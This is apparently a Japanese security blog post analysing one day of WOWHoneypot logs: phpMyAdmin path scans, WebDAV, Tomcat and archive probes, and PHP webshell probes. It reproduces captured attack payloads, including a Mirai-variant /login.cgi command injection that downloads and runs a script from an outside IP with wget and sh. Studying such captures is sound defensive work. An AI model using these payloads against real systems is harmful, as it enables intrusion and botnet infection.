S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypot簡易分析(20日目)

WOWHoneypot簡易分析(20日目)

honeypot

WOWhoneypotの2018/6/23(土)(運用20日目)の簡易分析です。

 

本日の総アクセス件数は212件です。

73 [2018-06-23 "HEAD /
40 [2018-06-23 "GET /
3 [2018-06-23 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
2 [2018-06-23 "GET /xampp/phpmyadmin/index.php
2 [2018-06-23 "GET /www/phpMyAdmin/index.php
2 [2018-06-23 "GET /web/phpMyAdmin/index.php
2 [2018-06-23 "GET /typo3/phpmyadmin/index.php
2 [2018-06-23 "GET /tools/phpMyAdmin/index.php
2 [2018-06-23 "GET /pmd/index.php
2 [2018-06-23 "GET /pma-old/index.php
2 [2018-06-23 "GET /pmamy/index.php
2 [2018-06-23 "GET /pmamy2/index.php
2 [2018-06-23 "GET /PMA/index.php
2 [2018-06-23 "GET /pma/index.php
2 [2018-06-23 "GET /PMA2/index.php
2 [2018-06-23 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-23 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-23 "GET /phpMyAdminold/index.php
2 [2018-06-23 "GET /phpMyAdmin.old/index.php
2 [2018-06-23 "GET /phpmyadmin-old/index.php
2 [2018-06-23 "GET /phpMyAdmin/index.php
2 [2018-06-23 "GET /phpmyadmin/index.php
2 [2018-06-23 "GET /phpMyadmin_bak/index.php
2 [2018-06-23 "GET /phpmyadmin2/index.php
2 [2018-06-23 "GET /phpmyadmin1/index.php
2 [2018-06-23 "GET /phpmyadmin0/index.php
2 [2018-06-23 "GET /phpma/index.php
2 [2018-06-23 "GET /phpadmin/index.php
2 [2018-06-23 "GET /mysql/index.php
2 [2018-06-23 "GET /mysqladmin/index.php
2 [2018-06-23 "GET /mysql-admin/index.php
2 [2018-06-23 "GET /myadmin/index.php
2 [2018-06-23 "GET /myadmin2/index.php
2 [2018-06-23 "GET /index.php
2 [2018-06-23 "GET /db/index.php
2 [2018-06-23 "GET /dbadmin/index.php
2 [2018-06-23 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-23 "GET /admin/PMA/index.php
2 [2018-06-23 "GET /admin/pma/index.php
2 [2018-06-23 "GET /admin/phpMyAdmin/index.php
2 [2018-06-23 "GET /admin/phpmyadmin/index.php
2 [2018-06-23 "GET /admin/phpmyadmin2/index.php
2 [2018-06-23 "GET /admin/mysql/index.php
2 [2018-06-23 "GET /admin/mysql2/index.php
2 [2018-06-23 "GET /admin/index.php
1 [2018-06-23 "PROPFIND /
1 [2018-06-23 "POST /xx.php
1 [2018-06-23 "POST /xw.php
1 [2018-06-23 "POST /wuwu11.php
1 [2018-06-23 "POST /w.php
1 [2018-06-23 "POST /s.php
1 [2018-06-23 "POST /sheep.php
1 [2018-06-23 "POST /db_session.init.php
1 [2018-06-23 "POST /db.init.php
1 [2018-06-23 "GET /webdav/
1 [2018-06-23 "GET /manager/html
1 [2018-06-23 "GET /db.rar

またPMA系が多いので除外します。/も。

3 [2018-06-23 "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
1 [2018-06-23 "POST /xx.php
1 [2018-06-23 "POST /xw.php
1 [2018-06-23 "POST /wuwu11.php
1 [2018-06-23 "POST /w.php
1 [2018-06-23 "POST /s.php
1 [2018-06-23 "POST /sheep.php
1 [2018-06-23 "POST /db_session.init.php
1 [2018-06-23 "POST /db.init.php
1 [2018-06-23 "GET /webdav/
1 [2018-06-23 "GET /manager/html
1 [2018-06-23 "GET /db.rar

1. phpに対するPOST通信

POST /wuwu11.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9) );

POST /xw.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9) );

POST /xx.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9) );

POST /s.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9) );

POST /w.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9) );

POST /db.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9) );

POST /db_session.init.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9) );

POST /sheep.php HTTP/1.1
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9) )

まとめると以下になります。

/wuwu11.php  h=die('Hello, Peppa!'.(string)(111111111*9) );
/xw.php  h=die('Hello, Peppa!'.(string)(111111111*9) );
/xx.php  axa=die('Hello, Peppa!'.(string)(111111111*9) );
/s.php leng=die('Hello, Peppa!'.(string)(111111111*9) );
/w.php leng=die('Hello, Peppa!'.(string)(111111111*9) );
/db.init.php eval=die('Hello, Peppa!'.(string)(111111111*9) );
/db_session.init.php eval=die('Hello, Peppa!'.(string)(111111111*9) );
/sheep.php m=die('Hello, Peppa!'.(string)(111111111*9) )

過去と比較して、'Hello, Peppa!'. は今回追加されています。前回は無かったため、exploitには関係のない部分ということが分かります。
また、これまで来ていたものを見返しましたが、パスとそれに対する変数名の組み合わせは全て同一です。恐らく、この組み合わせで脆弱性があるものと思われます。
これらの情報で調べて見たところ、様々なサイトでアクセスエラーログで出ているのを見つけました。
ただ、どんなものを狙ったのか、という情報は見つけられませんでした。残念。

2. WebDAVの調査

WebDAV(HTTPでファイルアップロード、更新等が可能なプロトコル)の標準的なパスに対する調査行為です。

GET /webdav/ HTTP/1.1
Connection: Close

3. rarファイルの調査

Webサーバ管理者が管理目的等でdbを圧縮ファイルにしてそのまま置いてあるものがないかを調査しているのかと思われます。

GET /db.rar HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Referer: hxxp://(WOW-IP):80/db.rar
Host: 210.140

 4. Mirai亜種Satori/Shinoa

1件→8件→33件→16件→5件→5件→2件→1件→3件となりました。流行している、という程の数ではないようです。

5. 既知のもの

GET /manager/html →Tomcatの管理ページが存在するかの調査

 

本日のハンティングログです。全てMirai亜種Satori/Shinoaのものです。

3 [2018-06-23 wget hxxp://185.62.190[.]191/r

以上です。